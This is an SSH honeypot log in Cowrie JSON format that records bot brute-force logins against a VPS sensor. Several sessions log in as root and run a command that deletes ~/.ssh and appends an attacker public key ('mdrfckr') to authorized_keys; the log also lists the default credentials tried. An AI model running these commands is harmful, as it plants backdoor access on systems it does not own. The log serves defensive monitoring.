{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:39:06.400051Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:39:06.526013Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:06.527324Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33757,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94e0a4855dd","protocol":"ssh","message":"New connection: 102.88.137.80:33757 (1.2.3.4:22) [session: f94e0a4855dd]","sensor":"my-vps","timestamp":"2025-08-31T01:39:06.647842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:39:06.649223Z","src_ip":"102.88.137.80","session":"f94e0a4855dd"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:39:06.772297Z","src_ip":"102.88.137.80","session":"f94e0a4855dd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:39:07.308099Z","src_ip":"102.88.137.80","session":"f94e0a4855dd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:08.433940Z","src_ip":"102.88.137.80","session":"f94e0a4855dd"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17618,"dst_ip":"1.2.3.4","dst_port":22,"session":"85b742c60924","protocol":"ssh","message":"New connection: 102.88.137.80:17618 (1.2.3.4:22) [session: 85b742c60924]","sensor":"my-vps","timestamp":"2025-08-31T01:39:08.555785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:39:08.557037Z","src_ip":"102.88.137.80","session":"85b742c60924"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:39:08.679967Z","src_ip":"102.88.137.80","session":"85b742c60924"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:39:09.213204Z","src_ip":"102.88.137.80","session":"85b742c60924"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:09.337185Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:09.338274Z","src_ip":"102.88.137.80","session":"85b742c60924"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47510,"dst_ip":"1.2.3.4","dst_port":22,"session":"0638967a1fd2","protocol":"ssh","message":"New connection: 212.227.125.160:47510 (1.2.3.4:22) [session: 0638967a1fd2]","sensor":"my-vps","timestamp":"2025-08-31T01:39:11.353013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:39:11.886105Z","src_ip":"212.227.125.160","session":"0638967a1fd2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:39:11.886847Z","src_ip":"212.227.125.160","session":"0638967a1fd2"}
{"eventid":"cowrie.login.failed","username":"docker","password":"1234567","message":"login attempt [docker/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:39:12.638570Z","src_ip":"212.227.125.160","session":"0638967a1fd2"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:14.195537Z","src_ip":"212.227.125.160","session":"0638967a1fd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38974,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bfc7bedad00","protocol":"ssh","message":"New connection: 212.227.235.229:38974 (1.2.3.4:22) [session: 2bfc7bedad00]","sensor":"my-vps","timestamp":"2025-08-31T01:39:50.899367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:39:51.923968Z","src_ip":"212.227.235.229","session":"2bfc7bedad00"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:39:51.925063Z","src_ip":"212.227.235.229","session":"2bfc7bedad00"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":52972,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1197e3f82eb","protocol":"ssh","message":"New connection: 82.67.125.95:52972 (1.2.3.4:22) [session: d1197e3f82eb]","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.044124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.045473Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.076729Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.login.success","username":"root","password":"root123!@#","message":"login attempt [root/root123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.241815Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:39:56.322405Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.323162Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.324315Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.355763Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:39:56.477776Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.478457Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.511270Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.512079Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":52984,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b641ae07fd8","protocol":"ssh","message":"New connection: 82.67.125.95:52984 (1.2.3.4:22) [session: 3b641ae07fd8]","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.541418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.542084Z","src_ip":"82.67.125.95","session":"3b641ae07fd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.572745Z","src_ip":"82.67.125.95","session":"3b641ae07fd8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:39:56.737367Z","src_ip":"82.67.125.95","session":"3b641ae07fd8"}
{"eventid":"cowrie.login.failed","username":"docker","password":"12345678","message":"login attempt [docker/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:39:57.100673Z","src_ip":"212.227.235.229","session":"2bfc7bedad00"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:57.771512Z","src_ip":"82.67.125.95","session":"3b641ae07fd8"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":52990,"dst_ip":"1.2.3.4","dst_port":22,"session":"b943948f2dd3","protocol":"ssh","message":"New connection: 82.67.125.95:52990 (1.2.3.4:22) [session: b943948f2dd3]","sensor":"my-vps","timestamp":"2025-08-31T01:39:57.805854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:39:57.806779Z","src_ip":"82.67.125.95","session":"b943948f2dd3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:39:57.842702Z","src_ip":"82.67.125.95","session":"b943948f2dd3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:39:58.026043Z","src_ip":"82.67.125.95","session":"b943948f2dd3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:58.062942Z","src_ip":"82.67.125.95","session":"d1197e3f82eb"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:58.064789Z","src_ip":"82.67.125.95","session":"b943948f2dd3"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:59.003686Z","src_ip":"212.227.235.229","session":"2bfc7bedad00"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":43570,"dst_ip":"1.2.3.4","dst_port":22,"session":"6867d85ac928","protocol":"ssh","message":"New connection: 115.190.94.119:43570 (1.2.3.4:22) [session: 6867d85ac928]","sensor":"my-vps","timestamp":"2025-08-31T01:40:10.142947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:40:10.143922Z","src_ip":"115.190.94.119","session":"6867d85ac928"}
